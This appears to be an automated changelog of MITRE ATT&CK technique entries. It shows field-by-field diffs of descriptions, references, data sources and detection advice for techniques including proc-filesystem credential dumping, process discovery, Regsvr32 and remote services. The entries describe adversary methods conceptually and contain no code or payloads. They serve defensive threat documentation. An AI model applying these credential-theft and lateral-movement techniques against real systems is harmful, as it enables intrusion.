x_mitre_detectionMonitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. For network infrastructure devices, collect AAA logging to monitor for private keys being exported.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Kaspersky Careto', 'description': 'Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.', 'url': 'https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf'}
external_references{'source_name': 'Microsoft Primary Refresh Token', 'description': 'Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.', 'url': 'https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token'}
external_references{'source_name': 'Wikipedia Public Key Crypto', 'description': 'Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.', 'url': 'https://en.wikipedia.org/wiki/Public-key_cryptography'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1003.007] OS Credential Dumping: Proc Filesystem

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather credentials from information stored it1Adversaries may gather credentials from the proc filesystem 
>n the Proc filesystem or <code>/proc</code>. The Proc filesy>or `/proc`. The proc filesystem is a pseudo-filesystem used 
>stem on Linux contains a great deal of information regarding>as an interface to kernel data structures for Linux based sy
> the state of the running operating system. Processes runnin>stems managing virtual memory. For each process, the `/proc/
>g with root privileges can use this facility to scrape live ><PID>/maps` file shows how memory is mapped within the proce
>memory of other running programs. If any of these programs s>ss’s virtual address space. And `/proc/<PID>/mem`, exposed f
>tore passwords in clear text or password hashes in memory, t>or debugging purposes, provides access to the process’s virt
>hese values can then be harvested for either usage or brute >ual address space.(Citation: Picus Labs Proc cump 2022)(Cita
>force attacks, respectively.  This functionality has been im>tion: baeldung Linux proc map 2022)  When executing with roo
>plemented in the MimiPenguin(Citation: MimiPenguin GitHub Ma>t privileges, adversaries can search these memory locations 
>y 2017), an open source tool inspired by Mimikatz. The tool >for all processes on a system that contain patterns that are
>dumps process memory, then harvests passwords and hashes by > indicative of credentials, such as looking for fixed string
>looking for text strings and regex patterns for how given ap>s in memory structures or cached hashes. When running withou
>plications such as Gnome Keyring, sshd, and Apache use memor>t privileged access, processes can still view their own virt
>y to store such authentication artifacts.>ual memory locations. Some services or programs may save cre
 >dentials in clear text inside the process’s memory.(Citation
 >: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc
 > Gitbook)  If running as or with the permissions of a web br
 >owser, a process can search the `/maps` & `/mem` locations f
 >or common website credential patterns (that can also be used
 > to find adjacent memory within the same structure) in which
 > hashes or cleartext credentials may be located.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Tim (Wadhwa-)Brown']
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['root']
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 15:32:18.098000+00:002023-04-15 01:16:25.566000+00:00
descriptionAdversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
external_references[1]['source_name']MimiPenguin GitHub May 2017baeldung Linux proc map 2022
external_references[1]['description']Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.
external_references[1]['url']https://github.com/huntergregal/mimipenguinhttps://www.baeldung.com/linux/proc-id-maps
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Polop Linux PrivEsc Gitbook', 'description': 'Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.', 'url': 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem'}
external_references{'source_name': 'MimiPenguin GitHub May 2017', 'description': 'Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.', 'url': 'https://github.com/huntergregal/mimipenguin'}
external_references{'source_name': 'Picus Labs Proc cump 2022', 'description': 'Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.', 'url': 'https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use'}

[T1057] Process Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to get information about running prot1Adversaries may attempt to get information about running pro
>cesses on a system. Information obtained could be used to ga>cesses on a system. Information obtained could be used to ga
>in an understanding of common software/applications running >in an understanding of common software/applications running 
>on systems within the network. Adversaries may use the infor>on systems within the network. Adversaries may use the infor
>mation from [Process Discovery](https://attack.mitre.org/tec>mation from [Process Discovery](https://attack.mitre.org/tec
>hniques/T1057) during automated discovery to shape follow-on>hniques/T1057) during automated discovery to shape follow-on
> behaviors, including whether or not the adversary fully inf> behaviors, including whether or not the adversary fully inf
>ects the target and/or attempts specific actions.  In Window>ects the target and/or attempts specific actions.  In Window
>s environments, adversaries could obtain details on running >s environments, adversaries could obtain details on running 
>processes using the [Tasklist](https://attack.mitre.org/soft>processes using the [Tasklist](https://attack.mitre.org/soft
>ware/S0057) utility via [cmd](https://attack.mitre.org/softw>ware/S0057) utility via [cmd](https://attack.mitre.org/softw
>are/S0106) or <code>Get-Process</code> via [PowerShell](http>are/S0106) or <code>Get-Process</code> via [PowerShell](http
>s://attack.mitre.org/techniques/T1059/001). Information abou>s://attack.mitre.org/techniques/T1059/001). Information abou
>t processes can also be extracted from the output of [Native>t processes can also be extracted from the output of [Native
> API](https://attack.mitre.org/techniques/T1106) calls such > API](https://attack.mitre.org/techniques/T1106) calls such 
>as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, >as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, 
>this is accomplished with the <code>ps</code> command. Adver>this is accomplished with the <code>ps</code> command. Adver
>saries may also opt to enumerate processes via /proc.>saries may also opt to enumerate processes via /proc.  On ne
 >twork devices, [Network Device CLI](https://attack.mitre.org
 >/techniques/T1059/008) commands such as `show processes` can
 > be used to display current running processes.(Citation: US-
 >CERT-TA18-106A)(Citation: show_processes_cisco_cmd)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
external_referencesCisco. (2022, August 16). show processes - . Retrieved July 13, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
external_referencesCAPEC-573
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 18:05:53.130000+00:002023-04-12 23:34:02.125000+00:00
descriptionAdversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
external_references[1]['source_name']capecshow_processes_cisco_cmd
external_references[1]['url']https://capec.mitre.org/data/definitions/573.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor for `show` commands being run by non-standard users from non-standard locations.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_platformsNetwork

[T1012] Query Registry

Current version: 1.3

Version changed from: 1.2 → 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesWikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
external_referencesCAPEC-647
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 18:08:20.049000+00:002023-04-03 18:56:37.011000+00:00
external_references[1]['source_name']capecWikipedia Windows Registry
external_references[1]['url']https://capec.mitre.org/data/definitions/647.htmlhttps://en.wikipedia.org/wiki/Windows_Registry
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Wikipedia Windows Registry', 'description': 'Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.', 'url': 'https://en.wikipedia.org/wiki/Windows_Registry'}
x_mitre_data_sourcesProcess: Process Creation

[T1218.010] System Binary Proxy Execution: Regsvr32

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-11 20:41:41.503000+00:002023-04-21 12:24:56.148000+00:00
external_references[1]['source_name']Microsoft Regsvr32FireEye Regsvr32 Targeting Mongolian Gov
external_references[1]['description']Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.
external_references[1]['url']https://support.microsoft.com/en-us/kb/249873https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
external_references[3]['source_name']Carbon Black Squiblydoo Apr 2016Microsoft Regsvr32
external_references[3]['description']Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.
external_references[3]['url']https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/https://support.microsoft.com/en-us/kb/249873
external_references[4]['source_name']FireEye Regsvr32 Targeting Mongolian GovCarbon Black Squiblydoo Apr 2016
external_references[4]['description']Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.htmlhttps://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1021] Remote Services

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to log into a service specifically desig>g/techniques/T1078) to log into a service that accepts remot
>ned to accept remote connections, such as telnet, SSH, and V>e connections, such as telnet, SSH, and VNC. The adversary m
>NC. The adversary may then perform actions as the logged-on >ay then perform actions as the logged-on user.  In an enterp
>user.  In an enterprise environment, servers and workstation>rise environment, servers and workstations can be organized 
>s can be organized into domains. Domains provide centralized>into domains. Domains provide centralized identity managemen
> identity management, allowing users to login using one set >t, allowing users to login using one set of credentials acro
>of credentials across the entire network. If an adversary is>ss the entire network. If an adversary is able to obtain a s
> able to obtain a set of valid domain credentials, they coul>et of valid domain credentials, they could login to many dif
>d login to many different machines using remote access proto>ferent machines using remote access protocols such as secure
>cols such as secure shell (SSH) or remote desktop protocol (> shell (SSH) or remote desktop protocol (RDP).(Citation: SSH
>RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote D> Secure Shell)(Citation: TechNet Remote Desktop Services) Th
>esktop Services)  Legitimate applications (such as [Software>ey could also login to accessible SaaS or IaaS services, suc
> Deployment Tools](https://attack.mitre.org/techniques/T1072>h as those that federate their identities to the domain.   L
>) and other administrative programs) may utilize [Remote Ser>egitimate applications (such as [Software Deployment Tools](
>vices](https://attack.mitre.org/techniques/T1021) to access >https://attack.mitre.org/techniques/T1072) and other adminis
>remote hosts. For example, Apple Remote Desktop (ARD) on mac>trative programs) may utilize [Remote Services](https://atta
>OS is native software used for remote management. ARD levera>ck.mitre.org/techniques/T1021) to access remote hosts. For e
>ges a blend of protocols, including [VNC](https://attack.mit>xample, Apple Remote Desktop (ARD) on macOS is native softwa
>re.org/techniques/T1021/005) to send the screen and control >re used for remote management. ARD leverages a blend of prot
>buffers and [SSH](https://attack.mitre.org/techniques/T1021/>ocols, including [VNC](https://attack.mitre.org/techniques/T
>004) for secure file transfer.(Citation: Remote Management M>1021/005) to send the screen and control buffers and [SSH](h
>DM macOS)(Citation: Kickstart Apple Remote Desktop commands)>ttps://attack.mitre.org/techniques/T1021/004) for secure fil
>(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries>e transfer.(Citation: Remote Management MDM macOS)(Citation:
> can abuse applications such as ARD to gain remote code exec> Kickstart Apple Remote Desktop commands)(Citation: Apple Re
>ution and perform lateral movement. In versions of macOS pri>mote Desktop Admin Guide 3.3) Adversaries can abuse applicat
>or to 10.14, an adversary can escalate an SSH session to an >ions such as ARD to gain remote code execution and perform l
>ARD session which enables an adversary to accept TCC (Transp>ateral movement. In versions of macOS prior to 10.14, an adv
>arency, Consent, and Control) prompts without user interacti>ersary can escalate an SSH session to an ARD session which e
>on and gain access to data.(Citation: FireEye 2019 Apple Rem>nables an adversary to accept TCC (Transparency, Consent, an
>ote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstar>d Control) prompts without user interaction and gain access 
>t Apple Remote Desktop commands)>to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citati
 >on: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desk
 >top commands)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesApple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-555
values_changed
STIX FieldOld valueNew Value
modified2022-03-28 16:07:45.017000+00:002023-03-30 21:01:42.821000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
external_references[1]['source_name']capecApple Remote Desktop Admin Guide 3.3
external_references[1]['url']https://capec.mitre.org/data/definitions/555.htmlhttps://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf
external_references[2]['source_name']SSH Secure ShellRemote Management MDM macOS
external_references[2]['description']SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.
external_references[2]['url']https://www.ssh.com/sshhttps://support.apple.com/en-us/HT209161
external_references[3]['source_name']TechNet Remote Desktop ServicesKickstart Apple Remote Desktop commands
external_references[3]['description']Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.
external_references[3]['url']https://technet.microsoft.com/en-us/windowsserver/ee236407.aspxhttps://support.apple.com/en-us/HT201710
external_references[4]['source_name']Remote Management MDM macOSLockboxx ARD 2019
external_references[4]['description']Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.
external_references[4]['url']https://support.apple.com/en-us/HT209161http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html
external_references[5]['source_name']Kickstart Apple Remote Desktop commandsFireEye 2019 Apple Remote Desktop
external_references[5]['description']Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.
external_references[5]['url']https://support.apple.com/en-us/HT201710https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html
external_references[6]['source_name']Apple Remote Desktop Admin Guide 3.3TechNet Remote Desktop Services
external_references[6]['description']Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.
external_references[6]['url']https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdfhttps://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
external_references[7]['source_name']FireEye 2019 Apple Remote DesktopApple Unified Log Analysis Remote Login and Screen Sharing
external_references[7]['description']Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.htmlhttps://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
external_references[8]['source_name']Lockboxx ARD 2019SSH Secure Shell
external_references[8]['description']Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.
external_references[8]['url']http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.htmlhttps://www.ssh.com/ssh
x_mitre_data_sources[1]Module: Module LoadLogon Session: Logon Session Creation
x_mitre_data_sources[2]Network Traffic: Network Connection CreationNetwork Share: Network Share Access
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowCommand: Command Execution
x_mitre_data_sources[4]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[5]Logon Session: Logon Session CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[6]Network Share: Network Share AccessNetwork Traffic: Network Traffic Flow
x_mitre_version1.21.3
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'}

[T1036.003] Masquerading: Rename System Utilities

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-11-23 17:03:38.941000+00:002023-04-07 17:07:20.038000+00:00
external_references[1]['source_name']LOLBAS Main SiteTwitter ItsReallyNick Masquerading Update
external_references[1]['description']LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.
external_references[1]['url']https://lolbas-project.github.io/https://twitter.com/ItsReallyNick/status/1055321652777619457
external_references[4]['source_name']Twitter ItsReallyNick Masquerading UpdateLOLBAS Main Site
external_references[4]['description']Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.
external_references[4]['url']https://twitter.com/ItsReallyNick/status/1055321652777619457https://lolbas-project.github.io/
x_mitre_data_sources[0]Process: Process MetadataFile: File Metadata
x_mitre_data_sources[1]File: File ModificationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Metadata
x_mitre_data_sources[3]File: File MetadataFile: File Modification
x_mitre_version1.01.1

[T1218.011] System Binary Proxy Execution: Rundll32

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 18:12:39.357000+00:002023-04-21 12:25:32.096000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[1]File: File MetadataCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionFile: File Metadata
x_mitre_data_sources[3]Module: Module LoadProcess: Process Creation
x_mitre_version2.02.1

[T1021.002] Remote Services: SMB/Windows Admin Shares

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesFrench, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
external_referencesCAPEC-561
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 21:16:02.812000+00:002023-04-03 18:57:59.554000+00:00
external_references[1]['source_name']capecMedium Detecting WMI Persistence
external_references[1]['url']https://capec.mitre.org/data/definitions/561.htmlhttps://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
external_references[2]['source_name']Wikipedia Server Message BlockTechNet RPC
external_references[2]['description']Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.
external_references[2]['url']https://en.wikipedia.org/wiki/Server_Message_Blockhttps://technet.microsoft.com/en-us/library/cc787851.aspx
external_references[3]['source_name']TechNet RPCMicrosoft Admin Shares
external_references[3]['description']Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.
external_references[3]['url']https://technet.microsoft.com/en-us/library/cc787851.aspxhttp://support.microsoft.com/kb/314984
external_references[4]['source_name']Microsoft Admin SharesWindows Event Forwarding Payne
external_references[4]['description']Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.
